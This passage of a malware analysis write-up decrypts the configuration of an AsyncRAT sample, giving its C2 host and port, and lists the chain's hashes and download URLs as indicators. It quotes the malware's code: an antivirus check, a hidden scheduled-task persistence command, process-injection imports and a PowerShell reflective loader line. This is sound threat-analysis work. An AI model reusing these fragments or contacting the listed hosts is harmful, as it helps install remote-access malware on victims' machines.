                {
                    cryptoServiceProvider.KeySize = 256;
                    cryptoServiceProvider.BlockSize = 128;
                    cryptoServiceProvider.Mode = CipherMode.CBC;
                    cryptoServiceProvider.Padding = PaddingMode.PKCS7;
                    cryptoServiceProvider.Key = this._key;
                    cryptoServiceProvider.GenerateIV();
                    using (CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, cryptoServiceProvider.CreateEncryptor(), CryptoStreamMode.Write))
                    {
                        memoryStream.Write(cryptoServiceProvider.IV, 0, cryptoServiceProvider.IV.Length);
                        cryptoStream.Write(input, 0, input.Length);
                        cryptoStream.FlushFinalBlock();
                        using (HMACSHA256 hmacshA256 = new HMACSHA256(this._authKey))
                        {
                            byte[] hash = hmacshA256.ComputeHash(memoryStream.ToArray(), 32, memoryStream.ToArray().Length - 32);
                            memoryStream.Position = 0L;
                            memoryStream.Write(hash, 0, hash.Length);
                        }
                    }
                }
                return memoryStream.ToArray();
            }
        }

        public string Decrypt(string input) => Encoding.UTF8.GetString(this.Decrypt(Convert.FromBase64String(input)));

        public byte[] Decrypt(byte[] input)
        {
            if (input == null)
                throw new ArgumentNullException("input can not be null.");
            using (MemoryStream memoryStream = new MemoryStream(input))
            {
                using (AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider())
                {
                    cryptoServiceProvider.KeySize = 256;
                    cryptoServiceProvider.BlockSize = 128;
                    cryptoServiceProvider.Mode = CipherMode.CBC;
                    cryptoServiceProvider.Padding = PaddingMode.PKCS7;
                    cryptoServiceProvider.Key = this._key;
                    using (HMACSHA256 hmacshA256 = new HMACSHA256(this._authKey))
                    {
                        byte[] hash = hmacshA256.ComputeHash(memoryStream.ToArray(), 32, memoryStream.ToArray().Length - 32);
                        byte[] numArray = new byte[32];
                        memoryStream.Read(numArray, 0, numArray.Length);
                        if (!this.AreEqual(hash, numArray))
                            throw new CryptographicException("Invalid message authentication code (MAC).");
                    }
                    byte[] buffer1 = new byte[16];
                    memoryStream.Read(buffer1, 0, 16);
                    cryptoServiceProvider.IV = buffer1;
                    using (CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, cryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Read))
                    {
                        byte[] buffer2 = new byte[memoryStream.Length - 16L + 1L];
                        byte[] numArray = new byte[cryptoStream.Read(buffer2, 0, buffer2.Length)];
                        Buffer.BlockCopy((Array)buffer2, 0, (Array)numArray, 0, numArray.Length);
                        return numArray;
                    }
                }
            }
        }

        [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
        private bool AreEqual(byte[] a1, byte[] a2)
        {
            bool flag = true;
            for (int index = 0; index < a1.Length; ++index)
            {
                if ((int)a1[index] != (int)a2[index])
                    flag = false;
            }
            return flag;
        }
    }
    class Program
    {
        public static string Ports = "t2nKOzYj0cOv2qg0u7nSEzre18jIRtMkff+A1fJwmx9S2cNE4bS0isw35a+elH8vvEeq9rxQQr8ctp7SXAHv+g==";
        public static string Hosts = "l1VDtNQHYKw7oyejimwLEz6zOLp1GHm1MdlVlcglHPTNq6anPKeOUkfpT/uMgKB+uioOQOcc9kSHroapCjYk9g==";
        public static string Version = "24o55NfpOilJhXezbajaIIb7jIZcr0rs/SWgCkY3w2BpRI/dWG+4pbVfe8DcM0IDLonhFKodRBDiDa7PvXUocg==";
        public static string Install = "fLeN4+ZnNpHyL2eJbS7qkLdXAUi7wgp7SAVvuTwoPFLJyCgnmbhGYImfzVCDWdQ2bj3EtNFOyUK8rlPbb0L7Xg==";
        public static string InstallFolder = "%AppData%";
        public static string InstallFile = "";
        public static string Key = "RFo5TjhDZjBwMHRLOWpuSHZqdkI5Wm5DcWJMVmE0RHQ=";
        public static string MTX = "b7qHN0k+Zdo1gIrDiUYyNSkb7tmNLp2Uoc3ePKH2RSO5qM74MOlyATBPU66ctkvwLGfAL76/CIAY3H5WLw1bZiqAbzogm+cj+kEXLR4OwQI=";
        public static string Certificate = "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";
        public static string Serversignature = "I++EqoTbWaQ18dZ+DbXDG2Zq+S7/Fu0BsIDqeIGAYon7F+GNRWIVN+gZDsKGUhk4Y9oQ+aHr68H78iR99ZoBOm4zsqqjpSpke3heysvXPHdCTVnhMoXiT95qK0yHWkhEAssPXcQlJ3E0BAmDdj83Xzi+Xk6I+9hbgkz1jch8QR3mjJqqUVgjAkh9ymZuluih+epFScM+uf0MpBBAHre4bQkNts+6w9ubf6g2VD0e5Ipt0+VzRhspNhpdr14Eg81vd0wEj6oFYm1UxiPSJjWeF6D8+DEGSxNjmuLr8ODj1jbYMVXZ0598kDXxcZ/fqGuHrkC1EaXH0SybcumLqqwqZ4MBpQCsC7xCCFU689RJqTlt9NJnhwy0fps+28N4UTEl00FHOXYMBnmHsG111jWsIZXmke8t0bJCDRltq1o0nCKf2lUI07/yiS1OVUtaeBepWK+BZxk2ggbkJvjfFhVJZboxFb9h8yK5s+4fE1DvqHcxgTixpk7CEx4/RlTrd0Ol1mCOkNLpH6oe67UC8KqX7ZLUgT/YIH4lU/h3askcEJzXWQ4YFf1xiQD6tcy1QCF9RBHJfQO3umwx0RzvKEP07o6FtPhmkOYyx9PLnFLAhYD4BuAlhyf9dkKANXUZdNokRBn7fOD5CXtxHQqhaVnVK024LnrDlxFE7HbxMSlDfF1BbM6wmVNE3NUcFvHuTwl5kyMf8S0xRYGd04EiiPMuj7ZlwAsphOUj7GonsHGJVOVNSzmEraTZEWtAKV/89ooDPLGt2+/SqOcFS4bofxEYwx3WLI8nQPy0C+AuD5J37/ZnuO4GogZcPJ0AR6CAn0KFsCKsSgJ0pgICQ19MOpk7XU23DDo6OOQPGLK9pMZHdjp04GSCmZm8XIYnaXzODX33UtgfVy03c+91EknkxMPQqpHPx8PZzJvwbFpvbjhUvemCpr4uxYiWznVDkb3XjxGUf2ZBmY07p9qmO+/xooD4rw==";
        public static X509Certificate2 ServerCertificate;
        public static string Anti = "I9XbE9Y40w3b9h/252aXK3u3bOO9/cfbF48D4PqX1Nhx1lX3sAjOHSlPXNaUnA34kvPmCwiYwpKt2ButV3QDJA==";
        public static Aes256 aes256;
        public static string Pastebin = "H1jGb2NK/kGDPUld1Reh0VhfkUT1avpNoDOqgvb7luGqHBGAkWB+XsvBXESc5MCgrtFY7KXEB77kZ6jjFAQNJw==";
        public static string BDOS = "KBfTz24fL86ElK7C9Yl6ZE7mMLjov+CGSf7lapyRcxsTe2U9ODSTyXV0oxaYpKMxic5MiANIX2KW1MggpPYZuQ==";
        public static string Hwid = (string)null;
        public static string Delay = "3";
        public static string Group = "BDlmfJugzGq/Zshig+2ddnPtiMlHrM+OU7R4dJA1AHRRxVlTetFcwfD+oRsMM4JrDXDX/FrDKFh4Vtno15urKQ==";
        static void Main(string[] args)
        {
            Key = Encoding.UTF8.GetString(Convert.FromBase64String(Key));
            aes256 = new Aes256(Key);
            Console.WriteLine("Ports: " + aes256.Decrypt(Ports));
            Console.WriteLine("Hosts: " + aes256.Decrypt(Hosts));
            Console.WriteLine("Version: " + aes256.Decrypt(Version));
            Console.WriteLine("Install: " + aes256.Decrypt(Install));
            Console.WriteLine("MTX: " + aes256.Decrypt(MTX));
            Console.WriteLine("Pastebin: " + aes256.Decrypt(Pastebin));
            Console.WriteLine("PoAntirts: " + aes256.Decrypt(Anti));
            Console.WriteLine("BDOS: " + aes256.Decrypt(BDOS));
            Console.WriteLine("Group: " + aes256.Decrypt(Group));
            Console.WriteLine("Hardware ID: " + HwidGen.HWID());
            Console.WriteLine("Serversignature: " + aes256.Decrypt(Serversignature));
            Console.WriteLine("Certificate: " + new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate))));
        }
    }
}

Cutting out the junk, here is the important config settings:

Data Value
Ports 6666
Hosts 77.247.127.9
Version 0.5.7B
Install FALSE
MTX AsyncMutex_6SI8OkPnk
Pastebin null
PoAntirts FALSE
BDOS FALSE
Group Default

And the RAT Name, AsyncRAT Server is found within the certificate:

[Subject]
  CN=AsyncRAT Server

[Issuer]
  CN=AsyncRAT Server

[Serial Number]
  00DE9B835DD0EAB90FEC5273F4631DF5

[Not Before]
  03/06/2021 00:45:37

[Not After]
  31/12/9999 23:59:59

[Thumbprint]
  63563ADE4CCFA1B2434777AC37EF9A0F3DF61ECB

Some additional checks it does:

AV with WMI:

public static string Antivirus()
{
  try
  {
    using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("\\\\" + Environment.MachineName + "\\root\\SecurityCenter2", "Select * from AntivirusProduct"))
    {
      List<string> stringList = new List<string>();
      foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
        stringList.Add(managementBaseObject["displayName"].ToString());
      return stringList.Count == 0 ? "N/A" : string.Join(", ", stringList.ToArray());
    }
  }
  catch
  {
    return "N/A";
  }
}

Schedules a new task:

Process.Start(new ProcessStartInfo()
{
FileName = "cmd",
Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn \"" + Path.GetFileNameWithoutExtension(fileInfo.Name) + "\" /tr '\"" + fileInfo.FullName + "\"' & exit",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
});

Finally, using DNSpy, this can be modified to remove all its checks so it can be properly scanned:

A full write-up on the RAT can be found in: Threat Analysis Unit (TAU) Threat Intelligence Notification: AsyncRAT by Carbon Black.

DLL

Now that the EXE has been found, back to the DLL:

Looking through some classes:

Reminder of the strings:

Looking through this in DNSpy, its a total mess. For example, empty classes:

// VBNET.PE
// Token: 0x06000070 RID: 112 RVA: 0x00002D08 File Offset: 0x00000F08
[MethodImpl(MethodImplOptions.NoInlining)]
internal static short aRWAgUbQDpqbtwUcV0k(object A_0, int \u0020, short \u0020, char \u0020)
{
    return 0;
}

Single externals:

// VBNET.PE
// Token: 0x06000061 RID: 97
[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext")]
private static extern bool B8aPhkAZx(IntPtr \u0020, int[] \u0020);

To debug this I would be setting a breakpoint on the allocation method:

// VBNET.PE
// Token: 0x06000065 RID: 101
[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")]
private static extern int TrFvXFNaJ(IntPtr \u0020, int \u0020, int \u0020, int \u0020, int \u0020);

Anyway, there isn't much point in looking at this as the Exe was called Stub, and this loads that stub in. This can be seen in the Reflection loader command:

[Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run').Invoke($null,[object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$H1))

VBNET.PE and then the Run method, which is:

// VBNET.PE
// Token: 0x06000067 RID: 103 RVA: 0x00002C20 File Offset: 0x00000E20
[MethodImpl(MethodImplOptions.NoInlining)]
public static bool Run(string path, byte[] data)
{
    return true;
}

path is the aspnet_compiler.exe, and the data is the Exe thats already been analysed.

Conclusion

Below are the files analysed and their hashes:

File Stage SHA256
cad5c70239b96f18505a52693349cc2c5d86df6da882602b0ab421f3ff269f2a.js 1 CAD5C70239B96F18505A52693349CC2C5D86DF6DA882602B0AB421F3FF269F2A
JyN.txt 1 92BF8627F3603C744D115B6E85439F9EC3BC19AD4D4A45ED35E3F65C96511F0B
uDpmPTCcggnbTum9.jpg 2 0F15805ED21A5277808AD5EA81F17CD733D253A55A9D11923EBB897EC6A36D5F
TutrZFMMnSRNVaOq.jpg 3 DA1D96B03105B79BD4FCE2623458BE07DBDE68C63279AC3078E91CFE6A7EEABA
Stub.exe 4 22B5BF913635BC456D04899B2AC3E26669C6FC450E2A0EB01A695A9F717BCC85
VBNET.dll 4 91E89B9C89BEE655B18D596E4AEC6BD3D44658A2EA7CB90A97A018DA9E6DB858

RAT Config:

Config Setting
Ports 6666
Hosts 77.247.127.9
Version 0.5.7B
Install FALSE
MTX AsyncMutex_6SI8OkPnk
Pastebin null
PoAntirts FALSE
BDOS FALSE
Group Default

Certificate:

[Subject]
  CN=AsyncRAT Server

[Issuer]
  CN=AsyncRAT Server

[Serial Number]
  00DE9B835DD0EAB90FEC5273F4631DF5

[Not Before]
  03/06/2021 00:45:37

[Not After]
  31/12/9999 23:59:59

[Thumbprint]
  63563ADE4CCFA1B2434777AC37EF9A0F3DF61ECB

Files:

  1. cad5c70239b96f18505a52693349cc2c5d86df6da882602b0ab421f3ff269f2a.js
  2. JyN.txt
  3. uDpmPTCcggnbTum9.jpg
  4. TutrZFMMnSRNVaOq.jpg
  5. Stub.exe
  6. VBNET.dll

URLs:

  1. https://t.ly/3HaN
  2. https://hopkinsvillereunions.com/JyN.txt
  3. https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg
  4. https://hopkinsvillereunions.com/wp-content/themes/TutrZFMMnSRNVaOq.jpg
  5. https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk
  6. https://cdn.discordapp.com/attachments/808540577594736675/852340062045077534/firefox.bat